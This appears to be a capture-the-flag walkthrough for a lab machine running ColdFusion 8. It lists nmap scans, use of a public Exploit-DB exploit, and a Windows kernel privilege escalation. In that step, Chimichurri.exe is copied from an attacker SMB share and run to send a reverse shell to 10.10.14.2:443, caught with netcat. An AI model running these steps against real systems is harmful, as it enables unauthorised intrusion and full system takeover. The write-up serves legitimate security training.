Ping
ping 10.10.10.11
Nmap Default Scan
nmap 10.10.10.11 -oN dnmap
Nmap Service and Script Scan
nmap 10.10.10.11 -sC -sV -A -oN snmap
Nmap All port Scan
nmap -p- --min-rate 10000 10.10.10.11 -oN anmap
FMTP Enumeration on Port 8500
Moving in /CFIDE
/Administrator looks interesting
Can see the clodfusion version 8
Will search for any public exploits in the internet for the found Coldfusion Version
Found one from Exploit-DB https://www.exploit-db.com/exploits/50057
I have saved the python exploit code in my machine in a file named exp.py
Have to change a small part in the code
Set the lhost, lport, rhost and rport accordingly.
Run the Script
python3 exp.py
Got it…!
Got user.txt
Will jump to Privilege Escalation…!
Will Get System Info
Got the vulnerable build, and we know the method to elevate our privilege.
As we already done this type of PE in Box DEVEL, going to use same exploit Chimichurri.exe
https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe
Started smb Share
And copied the binary from our kali
copy \\10.10.14.2\kali\Chimichurri.exe
Ran the binary according to the usage
Chimichurri.exe 10.10.14.2 443
Got Reverse shell as Nt/Authority
rlwrap nc -nvlp 443
Got root.txt
Done with Arctic…:)